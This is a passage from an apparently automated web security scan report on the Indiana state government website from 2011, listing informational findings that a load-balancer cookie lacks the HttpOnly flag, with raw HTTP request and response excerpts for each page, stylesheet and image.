Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:01 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 18:22:06 GMT
ETag: "12d1e67-7482-4a1fea2722f80"
Accept-Ranges: bytes
Content-Length: 29826
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:01 GMT; path=/

......JFIF.....d.d.....C....................................................................C...........................................................................................................
...[SNIP]...

14.564. http://www.in.gov/idem/hoosierscare/5601.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /idem/hoosierscare/5601.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /idem/hoosierscare/5601.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 51390

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 5601 - publ
...[SNIP]...

14.565. http://www.in.gov/iedc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /iedc/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iedc/ HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:39:01 GMT
Server: Apache
Location: http://www.iedc.in.gov/
Content-Length: 207
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:01 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.iedc.in.gov/">here</a>.</p>
</body><
...[SNIP]...

14.566. http://www.in.gov/isda/2435.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /isda/2435.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /isda/2435.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:01 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:01 GMT; path=/
Content-Length: 29700

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2435 - pub
...[SNIP]...

14.567. http://www.in.gov/oed/2367.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /oed/2367.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oed/2367.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:02 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:02 GMT; path=/
Content-Length: 36786

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2367 - pub
...[SNIP]...

14.568. http://www.in.gov/oed/2572.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /oed/2572.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oed/2572.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:02 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:02 GMT; path=/
Content-Length: 25302

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2572 - pub
...[SNIP]...

14.569. http://www.in.gov/pla/license.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /pla/license.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pla/license.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:03 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:03 GMT; path=/
Content-Length: 22464

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 3113 - pub
...[SNIP]...

14.570. http://www.in.gov/portal/global/css/5.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/css/5.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/css/5.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:53 GMT
Server: Apache
Last-Modified: Tue, 22 Feb 2011 22:00:59 GMT
ETag: "595e10-8d71-49ce61d8c7cc0"
Accept-Ranges: bytes
Content-Length: 36209
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:53 GMT; path=/

@import url(/ai/appfiles/cms/alert.css);

body { position: relative; height: 100%; margin: 0px; padding: 0px; font: 11px Arial, Verdana, Helvetica, sans-serif; color: #000000; text-align:center; displ
...[SNIP]...

14.571. http://www.in.gov/portal/global/css/7.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/css/7.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/css/7.css HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:54 GMT
Server: Apache
Last-Modified: Mon, 29 Jun 2009 12:34:22 GMT
ETag: "595e0d-9d0-46d7be8dc4f80"
Accept-Ranges: bytes
Content-Length: 2512
Content-Type: text/css
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:54 GMT; path=/

...body {
position: relative;
height: 100%;
margin: 0px;
padding: 0px;
font: 80% Verdana, Arial, Helvetica, sans-serif;
text-align:center;
display: block;
}

a:link {
text-decoration:
...[SNIP]...

14.572. http://www.in.gov/portal/global/images/about_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/about_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/about_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:01 GMT
Server: Apache
Last-Modified: Thu, 13 Dec 2007 14:15:09 GMT
ETag: "9bee8c-2d2-4412b92cab540"
Accept-Ranges: bytes
Content-Length: 722
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:01 GMT; path=/

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................4.F.................................
...[SNIP]...

14.573. http://www.in.gov/portal/global/images/bullet_white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/bullet_white.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/bullet_white.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:06 GMT
Server: Apache
Last-Modified: Thu, 13 Dec 2007 14:15:09 GMT
ETag: "2fab11-31-4412b92cab540"
Accept-Ranges: bytes
Content-Length: 49
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:06 GMT; path=/

GIF89a.............!.......,............b...h`..;

14.574. http://www.in.gov/portal/global/images/header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/header.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/header.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:57 GMT
Server: Apache
Last-Modified: Thu, 08 Jul 2010 18:19:10 GMT
ETag: "1d23bf6-8362-48ae4529c6380"
Accept-Ranges: bytes
Content-Length: 33634
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:57 GMT; path=/

......JFIF.....H.H.....ZExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:07:08 14:19:09.........
...[SNIP]...

14.575. http://www.in.gov/portal/global/images/horz_nav.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/horz_nav.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/horz_nav.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:01 GMT
Server: Apache
Last-Modified: Thu, 08 Jul 2010 18:31:26 GMT
ETag: "1d23bf7-6897-48ae47e7adb80"
Accept-Ranges: bytes
Content-Length: 26775
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:01 GMT; path=/

......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:07:08 14:31:25.........
...[SNIP]...

14.576. http://www.in.gov/portal/global/images/horz_nav2_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/horz_nav2_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/horz_nav2_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:08 GMT
Server: Apache
Last-Modified: Thu, 13 Dec 2007 14:15:10 GMT
ETag: "9bee94-144-4412b92d9f780"
Accept-Ranges: bytes
Content-Length: 324
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:08 GMT; path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ..........................................
...[SNIP]...

14.577. http://www.in.gov/portal/global/images/mobile-icon-hover4.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/mobile-icon-hover4.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/mobile-icon-hover4.gif HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:06 GMT
Server: Apache
Last-Modified: Tue, 13 Oct 2009 18:53:02 GMT
ETag: "1bf473d-240-475d58e41bf80"
Accept-Ranges: bytes
Content-Length: 576
Content-Type: image/gif
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:06 GMT; path=/

GIF89a................................................................................................................................................................................................
...[SNIP]...

14.578. http://www.in.gov/portal/global/images/nav_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/nav_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/nav_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:04 GMT
Server: Apache
Last-Modified: Thu, 13 Dec 2007 14:15:09 GMT
ETag: "9bee9b-2e1-4412b92cab540"
Accept-Ranges: bytes
Content-Length: 737
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:04 GMT; path=/

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................4.n.................................
...[SNIP]...

14.579. http://www.in.gov/portal/global/images/rss-logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/rss-logo.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/rss-logo.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:06 GMT
Server: Apache
Last-Modified: Fri, 12 Jun 2009 20:14:44 GMT
ETag: "184da53-35b-46c2c5bf53500"
Accept-Ranges: bytes
Content-Length: 859
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:06 GMT; path=/

......JFIF.....d.d......Ducky.......d......Adobe.d....................................................................................................................................................
...[SNIP]...

14.580. http://www.in.gov/portal/global/images/search_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/search_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/search_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:57 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 17:39:16 GMT
ETag: "1b8bb2e-2c7d-4a1fe09431900"
Accept-Ranges: bytes
Content-Length: 11389
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:57 GMT; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2011:04:28 13:40:41.........
...[SNIP]...

14.581. http://www.in.gov/portal/global/images/tour_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /portal/global/images/tour_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/global/images/tour_bg.jpg HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/ai/errors/dwd_404.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1132785758-1304175835376; __utmz=58136434.1304175835.2.2.utmcsr=workoneworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=58136434.288860735.1304126856.1304126856.1304175835.2; __utmc=58136434; __utmb=58136434.1.10.1304175835; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:04:04 GMT
Server: Apache
Last-Modified: Thu, 13 Dec 2007 14:15:09 GMT
ETag: "9bee9c-1ee-4412b92cab540"
Accept-Ranges: bytes
Content-Length: 494
Content-Type: image/jpeg
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:05:04 GMT; path=/

......JFIF.....H.H.....C.............................
......
.

.

.....................C........

.............................................................4.n.................................
...[SNIP]...

14.582. http://www.in.gov/portal/global/javascript/9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
